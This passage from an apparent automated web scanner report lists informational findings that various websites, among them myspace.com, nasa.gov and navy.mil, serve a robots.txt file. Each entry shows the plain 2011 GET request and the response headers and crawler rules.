Server: Sun-ONE-Web-Server/6.1
Last-Modified: Wed, 15 Mar 2006 17:08:42 GMT
ETag: "1a-a0b33a80"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=10
Expires: Sat, 02 Apr 2011 13:25:17 GMT
Keep-Alive: timeout=120, max=526
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /
24.546. http://www.mlive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mlive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mlive.com

Response

HTTP/1.0 200 OK
Server: Apache
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:00:26 GMT
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:00:25 GMT
Content-Length: 595
Connection: close
Set-Cookie: Apache=69.2.101.254.1301752825968513; path=/; expires=Sun, 01-Apr-12 14:00:25 GMT

# Robots.txt for http://www.mlive.com/
# Last updated 03/01/2011

Sitemap: http://blog.mlive.com/www-sitemapindex.xml

User-agent: *
Disallow: /auctions/
Disallow: /cgi-bin/
Disallow: /printer/
Disal
...[SNIP]...
24.547. http://www.mocospace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mocospace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mocospace.com

Response

HTTP/1.0 200 OK
Server: Resin/4.0.6
ETag: "FyZeLr/gwrF"
Last-Modified: Wed, 30 Mar 2011 14:01:53 GMT
Accept-Ranges: bytes
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 7506
Date: Sat, 02 Apr 2011 13:53:31 GMT
Connection: close

User-agent: *
Sitemap: http://www.mocospace.com/sitemap-html.xml
Sitemap: http://www.mocospace.com/sitemap-xhtml.xml
Sitemap: http://www.mocospace.com/sitemap.jsp?f=sitemap_user-1
Sitemap: http://
...[SNIP]...
24.548. http://www.modelmayhem.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.modelmayhem.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.modelmayhem.com

Response

HTTP/1.1 200 OK
Server: IBSrv 1.0
Date: Sat, 02 Apr 2011 13:34:57 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Thu, 28 Oct 2010 00:08:18 GMT
ETag: "2e6cb86-87-493a223982080"
Accept-Ranges: bytes
Content-Length: 135
Vary: Accept-Encoding
Set-Cookie: BIGipServermodelmayhem_POOL=283381932.0.0000; path=/

User-agent: Mediapartners-Google
Disallow:
User-agent: Googlebot
Disallow:
User-agent: MSNBot
Disallow:
User-agent: Slurp
Disallow:
24.549. http://www.momswhothink.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.momswhothink.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.momswhothink.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:02:33 GMT
Content-Type: text/plain
Content-Length: 304
Last-Modified: Tue, 21 Jul 2009 16:14:38 GMT
Connection: close
Expires: Sat, 09 Apr 2011 14:02:33 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
24.550. http://www.moviesunlimited.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moviesunlimited.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.moviesunlimited.com

Response

HTTP/1.1 200 OK
Content-Length: 258
Content-Type: text/plain
Last-Modified: Thu, 02 Dec 2010 22:19:54 GMT
Accept-Ranges: bytes
ETag: "c65ce4b6f92cb1:3442"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:31 GMT
Connection: close

# MoviesUnlimited.com Robots File

User-agent: ImageBot
Disallow: /

User-agent: *
Disallow: /musite/error_pages/
Disallow: /musite/member/
Disallow: /musite/affiliate/
Disallow: /musite/popu
...[SNIP]...
24.551. http://www.movietickets.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.movietickets.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.movietickets.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 05 Oct 2005 20:43:22 GMT
Accept-Ranges: bytes
ETag: "1e39146dedc9c51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:31 GMT
Connection: close
Content-Length: 562

User-agent: *
Disallow: /ads/
Disallow: /inc/
Disallow: /style/
Disallow: /scripts/
Disallow: /mapquest/
Disallow: /images/
Disallow: /images_newsletter/
Disallow: /rep/
Disallow: /cgi-bin/

...[SNIP]...
24.552. http://www.mozilla.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mozilla.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mozilla.com

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-web03
Cache-Control: max-age=900
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:28:50 GMT
Keep-Alive: timeout=20, max=978
Expires: Sat, 02 Apr 2011 13:43:50 GMT
ETag: "1d80c4c-49-4990653d27e80"
Last-Modified: Tue, 04 Jan 2011 14:46:02 GMT
Content-Length: 73
Connection: close
X-Cache-Info: cached

User-agent: *
Disallow: /*/products/download.html
Disallow: /*/download/
24.553. http://www.mp3lyrics.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mp3lyrics.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mp3lyrics.org

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 25 Mar 2011 09:28:20 GMT
ETag: "284b9a0-508-49f4b36f17500"
Cache-Control: max-age=86400
Expires: Sat, 02 Apr 2011 21:43:24 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Content-Language: en
Content-Length: 1288
Date: Sat, 02 Apr 2011 14:13:58 GMT
X-Varnish: 2107313521 2103462317
Age: 59434
Via: 1.1 varnish
Connection: close

User-agent: Baiduspider
Crawl-Delay: 1
Request-Rate: 1/1
Allow: /
Disallow: /Trk/
Disallow: /In/
Disallow: /Out/
Disallow: /php/

User-agent: Googlebot
Allow: /
Disallow: /Trk/
Disallow: /In/
Disallow
...[SNIP]...
24.554. http://www.mp3raid.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mp3raid.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mp3raid.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.1
Last-Modified: Wed, 10 Feb 2010 11:37:03 GMT
ETag: "6050053-287-47f3d740415c0"
Accept-Ranges: bytes
Content-Length: 647
Connection: close
Content-Type: text/plain

#########################################
#########################################
### The following command will disable just the directory "private" and all its contents:
### Disallow: /private/
##
...[SNIP]...
24.555. http://www.mrmovietimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrmovietimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mrmovietimes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
Last-Modified: Thu, 20 Jan 2011 02:56:47 GMT
ETag: "e3-49a3e48ceb9c0"
Accept-Ranges: bytes
Content-Length: 227
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /test/
Disallow: /includes/
Disallow: /movie-theaters/printable.php
Disallow: /movie-theaters/my-theaters.html
Disallow: /fb-connect/
Sitemap: http://www.mrmovietimes.com
...[SNIP]...
24.556. http://www.msnbc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "0e5fe98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:46:09 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.msn.com/xml/SitemapIndex.xml
24.557. http://www.mtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 31 Mar 2011 17:54:56 GMT
ETag: "4797a10-1cc-49fcafdbbdc00"
Accept-Ranges: bytes
Content-Length: 460
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 12:43:43 GMT
Connection: close

Sitemap: http://www.mtv.com/sitemap_index.jhtml
User-agent: *
Disallow: /search/
Disallow: /*source=SEM_    
Disallow: /*partnersearch=
Disallow: /*searchterm=
Disallow: /*sicontent=
Disallow: /ne
...[SNIP]...
24.558. http://www.multimap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multimap.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.multimap.com

Response

HTTP/1.0 200 OK
Content-Length: 1879
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 21:36:26 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Cache-Control: public, max-age=15552000
Date: Sat, 02 Apr 2011 14:05:50 GMT
Connection: close

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...
24.559. http://www.musiciansfriend.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.musiciansfriend.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.musiciansfriend.com

Response

HTTP/1.0 200 OK
Server:
Last-Modified: Mon, 10 Aug 2009 18:13:58 GMT
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Vary: Host
Expires: Sat, 02 Apr 2011 13:40:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:40:08 GMT
Content-Length: 775
Connection: close
Set-Cookie: AKA-SESSION=35ce8f185c5000003827974d9aaa0400919f0000; path=/; domain=musiciansfriend.com
Set-Cookie: OMTR-AKAID=35ce8f185c5000003827974d9aaa0400929f0000; expires=Sun, 06-Mar-2016 13:40:08 GMT; path=/; domain=musiciansfriend.com
Set-Cookie: AKA-SESSION-5D=35ce8f185c5000003827974d9aaa0400939f0000; expires=Thu, 07-Apr-2011 13:40:08 GMT; path=/; domain=musiciansfriend.com

# Musicians Friend
# Modified 2009-08-10
User-agent: *
Disallow: /srs7/shop/
Disallow: /srs7/g=home/shop/
Disallow: /srs7/g=guitar/shop/
Disallow: /srs7/g=bass/shop/
Disallow: /srs7/g=key/shop/
...[SNIP]...
24.560. http://www.mybloglog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mybloglog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mybloglog.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:42:53 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Thu, 24 Feb 2011 05:17:31 GMT
Accept-Ranges: bytes
Content-Length: 70
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /buzz/lc_message/
Disallow: /buzz/lc_message2/
24.561. http://www.mycokerewards.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycokerewards.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mycokerewards.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 10 Jan 2011 19:20:00 GMT
ETag: "4045dd-33b-daa6b800"
Accept-Ranges: bytes
Content-Length: 827
Content-Type: text/plain; charset=ISO-8859-1
Expires: Sat, 02 Apr 2011 13:35:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:35:40 GMT
Connection: close

User-agent: *
Disallow: /catalog.do?searchType=*&
Allow: /catalog.do?searchType=
Disallow: /catalog.do?searchType=*&
Allow: /earnPoints.do
Disallow: /earnPoints.do?
Allow: /itemDetail.do?itemId=
...[SNIP]...
24.562. http://www.mycricket.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mycricket.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mycricket.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:53 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 05:56:22 GMT
ETag: "255-49bfb5b8e6d80"
Accept-Ranges: bytes
Content-Length: 597
Connection: close
Content-Type: text/plain

User-agent: *

Allow: /community/events/list/index.php
Disallow: /community/events/list/*
Disallow: /community/calendar-date/*
Disallow: /community/taxonomy/*
Disallow: /community/ical-email-me/*

...[SNIP]...
24.563. http://www.myheritage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myheritage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myheritage.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.2.9 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.9
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:41:04 GMT
Content-Length: 13194
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache

User-agent: *
Disallow: /storage/
Disallow: /Resources/
Disallow: /populate/
Disallow: /Utility/
Disallow: /F/
Disallow: /G/
Disallow: /H/
Disallow: /I/
Disallow: /FP/Scripts/
Disallow: /FP/
...[SNIP]...
24.564. http://www.mylife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylife.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_jk/1.2.30
Last-Modified: Thu, 29 Jul 2010 21:48:48 GMT
ETag: "258d60-23-48c8db2fc5000"
Accept-Ranges: bytes
Content-Length: 35
P3P: policyref="http://www.mylife.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OUR NOR"
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /upop.do
24.565. http://www.mylifetime.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylifetime.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylifetime.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 02 Apr 2011 06:43:07 GMT
X-Pingback: http://www.mylifetime.com/xmlrpc.php
RealServer: prodweb8
Cteonnt-Length: 1616
Content-Type: text/plain; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 13:35:22 GMT
Date: Sat, 02 Apr 2011 13:35:22 GMT
Content-Length: 1616
Connection: close

User-agent: *
# Directories
Disallow: /database/
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /sites/
Disallow: /themes/
Disallow: /scripts/
Disallow: /updates/
Disal
...[SNIP]...
24.566. http://www.mynewplace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mynewplace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mynewplace.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.7a
Cache-Control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa DEVa TAIa CONo OUR IND DSP CAO COR"
ETag: "6QC0bRdrRav"
Last-Modified: Wed, 30 Mar 2011 18:45:32 GMT
Accept-Ranges: bytes
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: ab=sv=1.2:T85=T850; domain=mynewplace.com; path=/; expires=Mon, 02-May-2011 13:57:15 GMT
Set-Cookie: mnpbiscotto=sv=1.3:cs=A:u=346426441:vs=N; domain=mynewplace.com; path=/; expires=Fri, 01-Jul-2011 13:57:15 GMT
Set-Cookie: JSESSIONID=efhbapEGYkh6W8BhoGw8s; path=/
Content-Type: text/plain; charset=UTF-8
Content-Length: 944
Date: Sat, 02 Apr 2011 13:57:15 GMT
Connection: close
Set-Cookie: BIGipServerWEB_APPS_WWW=2382430730.37919.0000; path=/
Vary: Accept-Encoding, User-Agent

User-agent: *
Disallow: /signin/
Disallow: /register/
Disallow: /action/
Disallow: /action/signInAction
Disallow: /action/signOutAction
Disallow: /authenticated/
Disallow: /saveproperty/
Disallow: /sa
...[SNIP]...
24.567. http://www.mysanantonio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mysanantonio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mysanantonio.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 21:27:16 GMT
ETag: "c5-53519500"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: public
Age: 0
Expires: Sat, 02 Apr 2011 14:15:16 GMT
x-cdn: Cotendo
Connection: close

Sitemap: http://www.mysanantonio.com/sitemap.xml
Sitemap: http://www.mysanantonio.com/sitemap_news.xml
User-agent: *
Allow: /
Disallow: /?controllerName=search
Disallow: /?controllerName=emailThis
24.568. http://www.myspace.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Server: faadf633c108eb7e53abcb7abbcf10a0d95fc14840170b44
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634373194476792130&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Sat, 09-Apr-2011 12:37:27 GMT; path=/
Set-Cookie: SessionDDF2=utUbQvCsEK0zQZjUgyM0uC0vpbwQeayiiwkdqa7incim7ZBWjI7CX011fsGAjo8YtZfw9zdOQQ/+h0SPnHevqA==; domain=.myspace.com; expires=Wed, 02-Apr-2031 12:37:27 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Chunk from Goonies
Date: Sat, 02 Apr 2011 12:37:27 GMT
Connection: keep-alive
Content-Length: 215
X-Vertical: profileidentities

User-agent: *
Disallow: /my/*
Disallow: /about/*
Disallow: /signup/*
Disallow: /webim/*
Disallow: /search/*
Disallow: /AdSandbox.ashx
Disallow: /help/reportabuse?*
Disallow: /signout
Disallow
...[SNIP]...
24.569. http://www.mystart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mystart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mystart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:19 GMT
Server: Microsoft-IIS/5.0
Last-Modified: Fri, 12 Feb 2010 16:05:32 GMT
ETag: "1066-2c-4b757c4c"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
24.570. http://www.myxer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myxer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myxer.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:18 GMT
Server: Microsoft-IIS/7.0
Cache-Control: private
Content-Length: 262
Content-Type: text/plain; charset=utf-8
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=8
Set-Cookie: ASP.NET_SessionId=xujhsd45sorjzr45ayyfkizv; path=/; HttpOnly
Set-Cookie: SERVERID=PW03; path=/
Vary: Accept-Encoding
Connection: close

#robots.txt

User-agent: *
Disallow: /wap/
Disallow: /ajax/
Disallow: /signin/

User-agent: Googlebot-Mobile
Disallow: /ajax/
Disallow: /flickr/
Disallow: /signin/

User-agent: MSNBot-Mobi
...[SNIP]...
24.571. http://www.myyearbook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myyearbook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:54 GMT
Server: Apache
Last-Modified: Mon, 19 Oct 2009 16:21:11 GMT
ETag: "c25469-8b-4764c223f2bc0"
Accept-Ranges: bytes
Content-Length: 139
X-Server-Name: web37
Connection: close
Content-Type: text/plain
X-MyPoolMember: 10.100.10.93

User-agent: *
Disallow: /info_signup
Noarchive: /

User-agent: Googlebot
Noarchive: /
Disallow: /ajax

User-agent: ia_archiver
Disallow: /
24.572. http://www.nadaguides.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nadaguides.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nadaguides.com

Response

HTTP/1.1 200 OK
Content-Length: 6522
Content-Type: text/plain
Last-Modified: Tue, 15 Mar 2011 01:03:39 GMT
Accept-Ranges: bytes
ETag: "4348efd1ace2cb1:6ef2"
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-NADAGuides: NY#4
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:51:58 GMT
Connection: close

User-Agent: *
Sitemap: http://www.nadaguides.com/sitemap_index.xml
Allow: /Cars/*/Incentives-and-Rebates
Disallow: /b2b/
Disallow: /Cars/*/Incentives
Disallow: /Cars/*/Owner-Ratings
Disallow: /C
...[SNIP]...
24.573. http://www.nasa.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nasa.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nasa.gov

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 13 Jun 2005 19:33:58 GMT
ETag: "118e8ec-6a-3f97199dab580"
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:39:06 GMT
Content-Length: 106
Connection: close

# Robots.txt file from http://www.nasa.gov
#
# All robots will spider the domain

User-agent: *
Disallow:
24.574. http://www.nationalgeographic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalgeographic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nationalgeographic.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 28 Feb 2011 20:58:26 GMT
X-Cache-Lookup: HIT from rpc6.int.ngeo.com:80
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Length: 2052
Xonnection: Xeep-Alive
Content-Type: text/plain
Cache-Control: max-age=2248
Expires: Sat, 02 Apr 2011 14:05:06 GMT
Date: Sat, 02 Apr 2011 13:27:38 GMT
Connection: close

##********************************
##GLOBAL - allowing crawler access to image filetypes per CC request
## - approved by editorial meeting 11/02/09
##********************************
User-agent: *
...[SNIP]...
24.575. http://www.navy.mil/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.navy.mil
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.navy.mil

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 11 Jun 2009 16:35:08 GMT
ETag: "0c6e694b2eac91:287"
Server: Microsoft-IIS/6.0
Header: US Navy
X-Powered-By: ASP.NET
Cache-Control: max-age=992
Date: Sat, 02 Apr 2011 13:56:00 GMT
Content-Length: 1556
Connection: close

User-agent: gsa-crawler+(Enterprise;+GEX-01325;+james.garrett.ctr@hq.afis.osd.mil)
Disallow: /images/
Disallow: /media/
Disallow: /management/
Disallow: /management/photodb
Disallow: /list_single
...[SNIP]...
24.576. http://www.nba.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nba.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nba.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 205
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:25:13 GMT
Connection: close

User-Agent: *
Disallow: /mediacentral/*
Disallow: /suns/tickets/vervelounge_requests.html
Disallow: /search
Sitemap: http://www.nba.com/video_sitemap_index.xml
Sitemap: http://www.nba.com/sitemap_inde
...[SNIP]...
24.577. http://www.nbc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nbc.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Last-Modified: Thu, 22 Oct 2009 00:40:25 GMT
ETag: "270e408-37-4767b5753b040"
Accept-Ranges: bytes
Content-Length: 55
Wirt: qw-p-web16.qwplatform.com
Content-Type: text/plain
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 13:25:28 GMT
Date: Sat, 02 Apr 2011 13:24:28 GMT
Connection: close
Set-Cookie: ak-mobile-true=no; expires=Sun, 03-Apr-2011 13:24:28 GMT; path=/
Vary: User-Agent

# robots.txt for /
#
#
#
User-agent: *
Disallow:/admin
24.578. http://www.nbcnewyork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcnewyork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nbcnewyork.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 04:30:58 GMT
X-Server-Name: dv-c1-r2-u14-b6
